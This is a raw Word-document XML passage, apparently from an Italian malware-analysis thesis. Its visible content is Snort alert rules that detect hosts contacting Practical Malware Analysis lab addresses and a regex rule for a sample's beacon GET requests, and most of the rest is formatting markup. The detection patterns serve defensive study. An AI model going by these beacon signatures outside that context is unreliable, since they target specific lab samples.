          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>152.147</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> any (msg:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Rilevato collegamento a Practical Malware Analysis (IP 3.33.152.147)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>; content:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Host: www.practicalmalwareanalysis.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>; sid:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1000001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709DFC6A" w14:textId="702837E6" w:rsidR="005C7EC6" w:rsidRDefault="005C7EC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03391"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">2. alert tcp any any -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>15.197</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>142.173</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> any (msg:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Rilevato collegamento a Practical Malware Analysis (IP 15.197.142.173)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>; content:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Host: www.practicalmalwareanalysis.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>; sid:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1000002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>; )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB7864" w14:textId="77777777" w:rsidR="00425BAE" w:rsidRDefault="00425BAE" w:rsidP="00425BAE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="957"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35457C6C" w14:textId="3B051225" w:rsidR="00515BDF" w:rsidRDefault="00515BDF" w:rsidP="00425BAE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="957"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regola più </w:t>
      </w:r>
      <w:r w:rsidR="00160C98">
        <w:t>robusta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4E256" w14:textId="77777777" w:rsidR="005C7EC6" w:rsidRDefault="005C7EC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8945"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1. alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BA960" w14:textId="77777777" w:rsidR="005C7EC6" w:rsidRDefault="005C7EC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8945"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>2.   (msg:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>" Rilevato collegamento a Practical Malware Analysis beacon;\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEDA131" w14:textId="77777777" w:rsidR="005C7EC6" w:rsidRDefault="005C7EC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8945"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  content:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"; http_method; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D9C0F" w14:textId="77777777" w:rsidR="005C7EC6" w:rsidRDefault="005C7EC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8945"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  pcre:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/\/[a-zA-Z0-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/]{24}([a-zA-Z0-9+/]{3}([a-zA-Z0-9+/]){1})+\/\2\.[a-zA-Z0-9]{3}/"; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE72AC1" w14:textId="429168A8" w:rsidR="005C7EC6" w:rsidRDefault="005C7EC6">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8945"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  sid:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7EC6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1926</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>017)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B6AF7" w14:textId="2D716622" w:rsidR="002523A2" w:rsidRPr="00397FF4" w:rsidRDefault="002523A2" w:rsidP="00397FF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="957"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002523A2" w:rsidRPr="00397FF4" w:rsidSect="00A07F59">
      <w:headerReference w:type="even" r:id="rId321"/>
      <w:headerReference w:type="default" r:id="rId322"/>
      <w:footerReference w:type="even" r:id="rId323"/>
      <w:footerReference w:type="default" r:id="rId324"/>
      <w:headerReference w:type="first" r:id="rId325"/>
      <w:footerReference w:type="first" r:id="rId326"/>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1B1E" w14:textId="77777777" w:rsidR="00AA023C" w:rsidRDefault="00AA023C" w:rsidP="003A1464">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F8F94B5" w14:textId="77777777" w:rsidR="00AA023C" w:rsidRDefault="00AA023C" w:rsidP="003A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Calibri-Bold">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri-BoldItalic">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8510" w14:textId="77777777" w:rsidR="003A1464" w:rsidRDefault="003A14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4802"/>
      <w:gridCol w:w="5237"/>
      <w:gridCol w:w="427"/>
    </w:tblGrid>
    <w:tr w:rsidR="00735E8F" w14:paraId="2D5CCB51" w14:textId="77777777" w:rsidTr="00735E8F">
      <w:trPr>
        <w:jc w:val="right"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4802" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="1868EDBF" w14:textId="0C002FFA" w:rsidR="00735E8F" w:rsidRDefault="00735E8F" w:rsidP="00D133F6">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:rPr>
              <w:caps/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5237" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:caps/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:alias w:val="Autore"/>
            <w:tag w:val=""/>
            <w:id w:val="1534539408"/>
            <w:placeholder>
              <w:docPart w:val="57A33E2E5AEE4B5391A2415A29E1861A"/>
            </w:placeholder>
            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
            <w:text/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w14:paraId="6D61A14E" w14:textId="0BC4CFEA" w:rsidR="00735E8F" w:rsidRDefault="00735E8F">
              <w:pPr>
                <w:pStyle w:val="Intestazione"/>
                <w:jc w:val="right"/>
                <w:rPr>
                  <w:caps/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:caps/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                </w:rPr>
                <w:t>MAURO GALATEO</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="427" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ED7D31" w:themeFill="accent2"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="55761051" w14:textId="77777777" w:rsidR="00735E8F" w:rsidRDefault="00735E8F">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5AB964F" w14:textId="77777777" w:rsidR="003A1464" w:rsidRDefault="003A146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F1E2" w14:textId="77777777" w:rsidR="003A1464" w:rsidRDefault="003A1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ED1D" w14:textId="77777777" w:rsidR="00AA023C" w:rsidRDefault="00AA023C" w:rsidP="003A1464">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2CEB576B" w14:textId="77777777" w:rsidR="00AA023C" w:rsidRDefault="00AA023C" w:rsidP="003A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6C85" w14:textId="0CB8CCB5" w:rsidR="003A1464" w:rsidRDefault="00AA023C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="2891E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282" o:spid="_x0000_s1027" type="#_x0000_t75" alt="" style="position:absolute;margin-left:0;margin-top:0;width:600.4pt;height:849.8pt;z-index:-251657216;mso-wrap-edited:f;mso-width-percent:0;mso-height-percent:0;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;mso-width-percent:0;mso-height-percent:0" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="sfondotesi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7703" w14:textId="0170FDA9" w:rsidR="003A1464" w:rsidRDefault="00AA023C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="66BFF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283" o:spid="_x0000_s1026" type="#_x0000_t75" alt="" style="position:absolute;margin-left:-38.7pt;margin-top:-57.75pt;width:600.4pt;height:849.8pt;z-index:-251656192;mso-wrap-edited:f;mso-width-percent:0;mso-height-percent:0;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin;mso-width-percent:0;mso-height-percent:0" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="sfondotesi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CD23" w14:textId="43DDA040" w:rsidR="003A1464" w:rsidRDefault="00AA023C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="28598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281" o:spid="_x0000_s1025" type="#_x0000_t75" alt="" style="position:absolute;margin-left:0;margin-top:0;width:600.4pt;height:849.8pt;z-index:-251658240;mso-wrap-edited:f;mso-width-percent:0;mso-height-percent:0;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;mso-width-percent:0;mso-height-percent:0" o:allowincell="f">
          <v:imagedata r:id="rId1" o:title="sfondotesi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238"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C01EE9A8"/>
    <w:lvl w:ilvl="0" w:tplc="B10E1180">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="FFFF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8650A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8304B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855B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBFABEEA"/>
    <w:lvl w:ilvl="0" w:tplc="B0181E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8E75D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2F409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F37343"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="747AD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7C4DAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C39E1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E031C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8AAF7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EB5489"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82B6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F4BFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1287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3B2218"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8304B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A48B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6678960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5A47DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="760C4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C52EFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="760C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3727F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44CCC37C"/>
    <w:lvl w:ilvl="0" w:tplc="F048AD0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0E3240"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D106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988"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84E841E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F17FBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1070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082D31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B86E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2A19BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C01EE9A8"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>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B9447D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2702C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5F14D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BD0A7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83337E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="760C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00838"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84E841E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8157CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52BC8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55775E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C01EE9A8"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>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7505317">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1340888021">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="56126566">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1092045893">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1453285517">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="958025597">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2049721029">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="814222858">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="801995154">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1766488384">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="464127472">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="425541064">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="704136362">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="562252006">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="818885673">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="715547932">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="19820659">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="864905869">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="695272358">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="349726464">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="428162329">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="581764346">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1571110760">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1221016274">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="4700551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64"/>
    <w:rsid w:val="00005288"/>
    <w:rsid w:val="00007A8A"/>
    <w:rsid w:val="00010C7A"/>
    <w:rsid w:val="00012CED"/>
    <w:rsid w:val="000138C7"/>
    <w:rsid w:val="00014319"/>
    <w:rsid w:val="00015A99"/>
    <w:rsid w:val="0002087B"/>
    <w:rsid w:val="000208E9"/>
    <w:rsid w:val="0002121A"/>
    <w:rsid w:val="000212C1"/>
    <w:rsid w:val="00022973"/>
    <w:rsid w:val="00026057"/>
    <w:rsid w:val="00027277"/>
    <w:rsid w:val="00027D6B"/>
    <w:rsid w:val="00027FDC"/>
    <w:rsid w:val="00030621"/>
    <w:rsid w:val="00031452"/>
    <w:rsid w:val="000325F0"/>
    <w:rsid w:val="00040871"/>
    <w:rsid w:val="000500D2"/>
    <w:rsid w:val="0005110A"/>
    <w:rsid w:val="00051721"/>
    <w:rsid w:val="00052AED"/>
    <w:rsid w:val="00054CF5"/>
    <w:rsid w:val="00055634"/>
    <w:rsid w:val="000566D8"/>
    <w:rsid w:val="00066DA7"/>
    <w:rsid w:val="0007089B"/>
    <w:rsid w:val="0007111F"/>
    <w:rsid w:val="00082321"/>
    <w:rsid w:val="0008234F"/>
    <w:rsid w:val="00082B8C"/>
    <w:rsid w:val="00083ABB"/>
    <w:rsid w:val="00083AC2"/>
    <w:rsid w:val="00087722"/>
    <w:rsid w:val="00087E77"/>
    <w:rsid w:val="000965CE"/>
    <w:rsid w:val="00097E61"/>
    <w:rsid w:val="000A5F76"/>
    <w:rsid w:val="000A7093"/>
    <w:rsid w:val="000B1427"/>
    <w:rsid w:val="000B172C"/>
    <w:rsid w:val="000B32BB"/>
    <w:rsid w:val="000B6BF4"/>
    <w:rsid w:val="000C3499"/>
    <w:rsid w:val="000C434F"/>
    <w:rsid w:val="000C781B"/>
    <w:rsid w:val="000D0077"/>
    <w:rsid w:val="000D02B2"/>
    <w:rsid w:val="000D16A8"/>
    <w:rsid w:val="000D1C58"/>
    <w:rsid w:val="000D40C2"/>
    <w:rsid w:val="000D4360"/>
    <w:rsid w:val="000D5080"/>
    <w:rsid w:val="000D760D"/>
    <w:rsid w:val="000E0A67"/>
    <w:rsid w:val="000E4291"/>
    <w:rsid w:val="000E5153"/>
    <w:rsid w:val="000E5BAA"/>
    <w:rsid w:val="000E6984"/>
    <w:rsid w:val="000F24B1"/>
    <w:rsid w:val="000F58AA"/>
    <w:rsid w:val="00101FF7"/>
    <w:rsid w:val="001020FB"/>
    <w:rsid w:val="00102116"/>
    <w:rsid w:val="00102461"/>
    <w:rsid w:val="001030D4"/>
